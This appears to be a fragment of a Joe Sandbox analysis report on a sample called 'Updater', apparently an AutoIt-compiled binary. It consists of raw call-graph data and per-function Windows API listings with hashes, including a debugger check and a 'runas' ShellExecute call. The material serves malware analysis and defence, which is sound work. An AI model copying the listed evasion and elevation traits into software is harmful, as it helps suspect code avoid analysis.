118385->118458 118390 b58c38 118388->118390 118391 b58c5e 118388->118391 118392 b58c7a 118388->118392 118389 b58bfc 118480 b52610 25 API calls pre_c_initialization 118389->118480 118390->118391 118398 b58c45 118390->118398 118459 b526b9 19 API calls __dosmaperr 118391->118459 118462 b5282e 20 API calls 2 library calls 118392->118462 118394 b58c63 118460 b526cc 19 API calls __dosmaperr 118394->118460 118446 b5f74c 118398->118446 118399 b58c91 118463 b527f4 118399->118463 118400 b58c6a 118461 b52610 25 API calls pre_c_initialization 118400->118461 118401 b58de3 118404 b58e59 118401->118404 118408 b58dfc GetConsoleMode 118401->118408 118407 b58e5d ReadFile 118404->118407 118406 b527f4 _free 19 API calls 118409 b58ca1 118406->118409 118410 b58e77 118407->118410 118411 b58ed1 GetLastError 118407->118411 118408->118404 118412 b58e0d 118408->118412 118413 b58cc6 118409->118413 118414 b58cab 118409->118414 118410->118411 118417 b58e4e 118410->118417 118415 b58e35 118411->118415 118416 b58ede 118411->118416 118412->118407 118418 b58e13 ReadConsoleW 118412->118418 118470 b59254 118413->118470 118468 b526cc 19 API calls __dosmaperr 118414->118468 118434 b58c75 __fread_nolock 118415->118434 118473 b52696 19 API calls 2 library calls 118415->118473 118476 b526cc 19 API calls __dosmaperr 118416->118476 118429 b58eb3 118417->118429 118430 b58e9c 118417->118430 118417->118434 118418->118417 118423 b58e2f GetLastError 118418->118423 118419 b527f4 _free 19 API calls 118419->118381 118423->118415 118424 b58cb0 118469 b526b9 19 API calls __dosmaperr 118424->118469 118425 b58ee3 118477 b526b9 19 API calls __dosmaperr 118425->118477 118432 b58eca 118429->118432 118429->118434 118474 b58891 30 API calls 4 library calls 118430->118474 118475 b586d1 28 API calls __wsopen_s 118432->118475 118434->118419 118435 b58ecf 118435->118434 118436->118342 118437->118358 118438->118353 118439->118350 118440->118361 118441->118362 118442->118358 118443->118343 118444->118350 118445->118358 118447 b5f766 118446->118447 118448 b5f759 118446->118448 118450 b5f772 118447->118450 118482 b526cc 19 API calls __dosmaperr 118447->118482 118481 b526cc 19 API calls __dosmaperr 118448->118481 118450->118401 118452 b5f75e 118452->118401 118453 b5f793 118483 b52610 25 API calls pre_c_initialization 118453->118483 118455->118376 118456->118381 118457->118385 118458->118389 118459->118394 118460->118400 118461->118434 118462->118399 118464 b5282c 118463->118464 118465 b527ff RtlFreeHeap 118463->118465 118464->118406 118465->118464 118466 b52814 118465->118466 118484 b526cc 19 API calls __dosmaperr 118466->118484 118468->118424 118469->118434 118485 b591bb 118470->118485 118473->118434 118474->118434 118475->118435 118476->118425 118477->118434 118478->118378 118479->118389 118480->118381 118481->118452 118482->118453 118483->118452 118484->118464 118486 b551f2 __wsopen_s 25 API calls 118485->118486 118487 b591cd 118486->118487 118488 b591d5 118487->118488 118489 b591e6 SetFilePointerEx 118487->118489 118494 b526cc 19 API calls __dosmaperr 118488->118494 118491 b591fe GetLastError 118489->118491 118492 b591da 118489->118492 118495 b52696 19 API calls 2 library calls 118491->118495 118492->118398 118494->118492 118495->118492 119942 b2a18d 119943 b2a1b3 119942->119943 119944 b68fa3 119942->119944 119945 b2a2fd 119943->119945 119947 b4042b 21 API calls 119943->119947 119946 b69063 119944->119946 119949 b69007 119944->119949 119956 b69027 119944->119956 119950 b4045b 21 API calls 119945->119950 119992 b94358 81 API calls __wsopen_s 119946->119992 119953 b2a1dd 119947->119953 119990 b2914c 93 API calls 119949->119990 119959 b2a334 __fread_nolock 119950->119959 119951 b6905e 119955 b4042b 21 API calls 119953->119955 119953->119959 119958 b2a22b 119955->119958 119956->119951 119991 b94358 81 API calls __wsopen_s 119956->119991 119957 b4045b 21 API calls 119957->119959 119958->119949 119961 b2a266 119958->119961 119959->119956 119959->119957 119960 b69086 119993 b94358 81 API calls __wsopen_s 119960->119993 119961->119951 119961->119959 119961->119960 119962 b2a2c7 119961->119962 119964 b29976 119961->119964 119962->119945 119962->119964 119965 b4042b 21 API calls 119964->119965 119966 b299d9 119965->119966 119982 b21e4e 119966->119982 119969 b4042b 21 API calls 119975 b29abe messages 119969->119975 119970 b21dd1 21 API calls 119980 b29dfc messages 119970->119980 119971 b2fbc8 21 API calls 119971->119975 119974 b6955a 119995 b8010c 21 API calls messages 119974->119995 119975->119971 119975->119974 119976 b69575 119975->119976 119978 b21dd1 21 API calls 119975->119978 119979 b29d61 messages 119975->119979 119994 b23574 21 API calls 119975->119994 119978->119975 119979->119970 119979->119980 119981 b29e13 119980->119981 119989 b224c6 21 API calls messages 119980->119989 119985 b21e5e 119982->119985 119983 b21e66 119983->119969 119984 b4042b 21 API calls 119984->119985 119985->119983 119985->119984 119986 b2f38f 21 API calls 119985->119986 119987 b2fbc8 21 API calls 119985->119987 119988 b21e4e 21 API calls 119985->119988 119986->119985 119987->119985 119988->119985 119989->119980 119990->119956 119991->119951 119992->119951 119993->119951 119994->119975 119995->119976

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 013F2BD8
                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 013F2BF6
                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 013F2C14
                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 013F2C32
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,013F2CC1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 013F2C7B
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,013F2E3D,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,013F2CC1,?,80000001), ref: 013F2C99
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,013F2CC8,00000000,00000000,00000005,00000000,013F2CC1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 013F2CBB
                                                                                                                                                    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 013F2CD8
                                                                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 013F2CE5
                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 013F2CEB
                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 013F2D16
                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 013F2D6B
                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 013F2D7B
                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 013F2DA7
                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 013F2DB7
                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 013F2DE1
                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 013F2DF1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                    • API String ID: 1759228003-2375825460
                                                                                                                                                    • Opcode ID: a9291703ae9773d8253386cdd9f7825a62a50a346ebf5e7712d32277e47c0149
                                                                                                                                                    • Instruction ID: 2fc730ff710963833402fe84a29c807764975135b2b9e6b668c1eed81633530e
                                                                                                                                                    • Opcode Fuzzy Hash: a9291703ae9773d8253386cdd9f7825a62a50a346ebf5e7712d32277e47c0149
                                                                                                                                                    • Instruction Fuzzy Hash: 15615F71A0424EBEEB51DAE8CC89FEFB7FC9B18708F404465B654E61C1D6B8DA448B60

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 500 b3310d-b3317c call b2f38f GetVersionExW call b2f82c 505 b33182 500->505 506 b77ad9-b77aec 500->506 508 b33184-b33186 505->508 507 b77aed-b77af1 506->507 511 b77af4-b77b00 507->511 512 b77af3 507->512 509 b77b18 508->509 510 b3318c-b331e6 call b2f9a0 call b2f433 508->510 517 b77b1f-b77b2b 509->517 525 b77c2f-b77c36 510->525 526 b331ec-b331ee 510->526 511->507 514 b77b02-b77b04 511->514 512->511 514->508 516 b77b0a-b77b11 514->516 516->506 520 b77b13 516->520 518 b3324c-b33266 GetCurrentProcess IsWow64Process 517->518 522 b332c7-b332cd 518->522 523 b33268 518->523 520->509 524 b3326e-b3327a 522->524 523->524 531 b77c74-b77c78 GetSystemInfo 524->531 532 b33280-b3328f LoadLibraryA 524->532 527 b77c56-b77c59 525->527 528 b77c38 525->528 529 b77b30-b77b43 526->529 530 b331f4-b331f7 526->530 536 b77c44-b77c4c 527->536 537 b77c5b-b77c6a 527->537 535 b77c3e 528->535 533 b77b45-b77b4e 529->533 534 b77b6c-b77b6e 529->534 530->518 538 b331f9-b33235 530->538 539 b33291-b3329f GetProcAddress 532->539 540 b332cf-b332d9 GetSystemInfo 532->540 541 b77b50-b77b56 533->541 542 b77b5b-b77b67 533->542 543 b77ba3-b77ba6 534->543 544 b77b70-b77b85 534->544 535->536 536->527 537->535 546 b77c6c-b77c72 537->546 538->518 547 b33237-b33240 538->547 539->540 548 b332a1-b332a5 GetNativeSystemInfo 539->548 545 b332a7-b332a9 540->545 541->518 542->518 553 b77be1-b77be4 543->553 554 b77ba8-b77bc3 543->554 551 b77b87-b77b8d 544->551 552 b77b92-b77b9e 544->552 549 b332b2-b332c6 545->549 550 b332ab-b332ac FreeLibrary 545->550 546->536 547->517 555 b33246 547->555 548->545 550->549 551->518 552->518 553->518 558 b77bea-b77c11 553->558 556 b77bc5-b77bcb 554->556 557 b77bd0-b77bdc 554->557 555->518 556->518 557->518 559 b77c13-b77c19 558->559 560 b77c1e-b77c2a 558->560 559->518 560->518
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00B3313C
                                                                                                                                                      • Part of subcall function 00B2F82C: _wcslen.LIBCMT ref: 00B2F83F
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00BBD9B8,00000000,?,?), ref: 00B33253
                                                                                                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00B3325A
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00B33285
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B33297
                                                                                                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00B332A5
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 00B332AC
                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 00B332D3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                    • API String ID: 3290436268-192647395
                                                                                                                                                    • Opcode ID: bfde6f050050f0ad9f5999fb6e1a145563caf47575630fd15ccff35726fe71b4
                                                                                                                                                    • Instruction ID: 708a04cc83bb235592c2c7be3e6a013e3f56a2ef511f965eeb4e19ae83c04aa4
                                                                                                                                                    • Opcode Fuzzy Hash: bfde6f050050f0ad9f5999fb6e1a145563caf47575630fd15ccff35726fe71b4
                                                                                                                                                    • Instruction Fuzzy Hash: 289180A294E3D5DFCB16C7787C815FA7FE5AB26700B1888D9D0849B221DE2C4508DB2A

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B32D63
                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00B32D76
                                                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00B32DE2
                                                                                                                                                      • Part of subcall function 00B2F82C: _wcslen.LIBCMT ref: 00B2F83F
                                                                                                                                                      • Part of subcall function 00B2A65C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B2A69D
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 00B32E63
                                                                                                                                                    • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00B77988
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B779C9
                                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00BE1E24), ref: 00B77A52
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000), ref: 00B77A59
                                                                                                                                                      • Part of subcall function 00B32C51: GetSysColorBrush.USER32(0000000F), ref: 00B32C5C
                                                                                                                                                      • Part of subcall function 00B32C51: LoadCursorW.USER32(00000000,00007F00), ref: 00B32C6B
                                                                                                                                                      • Part of subcall function 00B32C51: LoadIconW.USER32(00000063), ref: 00B32C81
                                                                                                                                                      • Part of subcall function 00B32C51: LoadIconW.USER32(000000A4), ref: 00B32C93
                                                                                                                                                      • Part of subcall function 00B32C51: LoadIconW.USER32(000000A2), ref: 00B32CA5
                                                                                                                                                      • Part of subcall function 00B32C51: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B32CBD
                                                                                                                                                      • Part of subcall function 00B32C51: RegisterClassExW.USER32(?), ref: 00B32D0E
                                                                                                                                                      • Part of subcall function 00B3FBB7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B3FBE5
                                                                                                                                                      • Part of subcall function 00B3FBB7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B3FC06
                                                                                                                                                      • Part of subcall function 00B3FBB7: ShowWindow.USER32(00000000), ref: 00B3FC1A
                                                                                                                                                      • Part of subcall function 00B3FBB7: ShowWindow.USER32(00000000), ref: 00B3FC23
                                                                                                                                                      • Part of subcall function 00B334C7: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B33598
                                                                                                                                                    Strings
                                                                                                                                                    • AutoIt, xrefs: 00B7797D
                                                                                                                                                    • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00B77982
                                                                                                                                                    • runas, xrefs: 00B77A4D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                    • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                    • API String ID: 683915450-2030392706
                                                                                                                                                    • Opcode ID: 690ead279c0d7bece79e4cd8a7a4d088da04dfef999f0d547818804e91e43933
                                                                                                                                                    • Instruction ID: 4734f8aed623c0dfa9db31a5ec7e91fc0babde910f11b9b922af51414cb5e718
                                                                                                                                                    • Opcode Fuzzy Hash: 690ead279c0d7bece79e4cd8a7a4d088da04dfef999f0d547818804e91e43933
                                                                                                                                                    • Instruction Fuzzy Hash: D7511071148385AFC701EF64EC429BE7BF8EB94B40F1009F9F585432A2DF68894AD766

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 855 13f2cc7 856 13f2cc8-13f2cf9 lstrcpyn GetThreadLocale GetLocaleInfoA 855->856 857 13f2cff-13f2d03 856->857 858 13f2df8-13f2dfe 856->858 859 13f2d0f-13f2d26 lstrlen 857->859 860 13f2d05-13f2d09 857->860 861 13f2d2b-13f2d31 859->861 860->858 860->859 862 13f2d3e-13f2d47 861->862 863 13f2d33-13f2d3c 861->863 862->858 865 13f2d4d-13f2d54 862->865 863->862 864 13f2d28 863->864 864->861 866 13f2d56-13f2d80 lstrcpyn LoadLibraryExA 865->866 867 13f2d82-13f2d84 865->867 866->867 867->858 868 13f2d86-13f2d8a 867->868 868->858 869 13f2d8c-13f2dc0 lstrcpyn LoadLibraryExA 868->869 869->858 870 13f2dc2-13f2df6 lstrcpyn LoadLibraryExA 869->870 870->858
                                                                                                                                                    APIs
                                                                                                                                                    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 013F2CD8
                                                                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 013F2CE5
                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 013F2CEB
                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 013F2D16
                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 013F2D6B
                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 013F2D7B
                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 013F2DA7
                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 013F2DB7
                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 013F2DE1
                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 013F2DF1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1599918012-0
                                                                                                                                                    • Opcode ID: b30b88bd219cbaf4d9da21ce8602e9a1d9637ed92d71513b3b0053543624a1ba
                                                                                                                                                    • Instruction ID: ac0981a4c2d904a20d8e686eca71a13def1246889eeb1efb1367db82ad9e4c2f
                                                                                                                                                    • Opcode Fuzzy Hash: b30b88bd219cbaf4d9da21ce8602e9a1d9637ed92d71513b3b0053543624a1ba
                                                                                                                                                    • Instruction Fuzzy Hash: E6313D71E0421EAEEB51DAECC888BEFB7FD9F58304F0041A5B259E21C1D6B8DA458B10
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B34E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 00B34E6B
                                                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00B34273
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00B342C5
                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00B342D8
                                                                                                                                                      • Part of subcall function 00B33AE2: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00B33B2A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ColorProc$LongWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3744519093-0
                                                                                                                                                    • Opcode ID: 12672744e1c08f37dbc3be3351fbea8167a1bbf18860fe1318e716ee63439742
                                                                                                                                                    • Instruction ID: 3d5b88f5daaba998cd6e946ab0a2bafc34824f41f63bf02f72cddebf2ff049d4
                                                                                                                                                    • Opcode Fuzzy Hash: 12672744e1c08f37dbc3be3351fbea8167a1bbf18860fe1318e716ee63439742
                                                                                                                                                    • Instruction Fuzzy Hash: 74A1F270154504BFE728AA288C9CEBB3ADDEB46340F3582D9F516E72A1CF65FD01C661
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 013F50D0
                                                                                                                                                    • FindClose.KERNEL32(00000000,00000000,?), ref: 013F50DB
                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 013F50F4
                                                                                                                                                    • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 013F5105
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2659516521-0
                                                                                                                                                    • Opcode ID: 35532445bcddddf072de4610115932bee76e299e86bdf79fb3123370f2aa134a
                                                                                                                                                    • Instruction ID: 992efa4242697c48625a15e3d01931530663b45acc5cafc97a8e40066e3ea85b
                                                                                                                                                    • Opcode Fuzzy Hash: 35532445bcddddf072de4610115932bee76e299e86bdf79fb3123370f2aa134a
                                                                                                                                                    • Instruction Fuzzy Hash: 8FF0B272D0020DB6DF51EAED8D859CFB7AC6B09218F500796E629E3191EB34DB488B51
                                                                                                                                                    Strings
                                                                                                                                                    • Variable is not of type 'Object'., xrefs: 00B672FB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Variable is not of type 'Object'.
                                                                                                                                                    • API String ID: 0-1840281001
                                                                                                                                                    • Opcode ID: e99243ad0c21d30d34665a4716b73d47e2161d133df54ed71246a91a2a2ba81b
                                                                                                                                                    • Instruction ID: f1e5f0750c5ddfb2335dc71ee450ffc038cafef5dcf73dc071bd3109745bd2e0
                                                                                                                                                    • Opcode Fuzzy Hash: e99243ad0c21d30d34665a4716b73d47e2161d133df54ed71246a91a2a2ba81b
                                                                                                                                                    • Instruction Fuzzy Hash: 8E327C70948228DBCF14DF94E894AEDB7F4FF15308F1440D9E80AAB291DB799E46CB64
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 74906ca78a5ed234824da2d21b4ef579ad23ae74e18219abc59e4195ec916c3d
                                                                                                                                                    • Instruction ID: be68be7296445d1d8c9efe5ed17a0ddc0ed5e3a0c0ce8a40cfea562a1559ef80
                                                                                                                                                    • Opcode Fuzzy Hash: 74906ca78a5ed234824da2d21b4ef579ad23ae74e18219abc59e4195ec916c3d
                                                                                                                                                    • Instruction Fuzzy Hash: 24A00231445A80DBDE11DB10CB49B09B761FBC0F01F108E64A0464781457785800D941

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
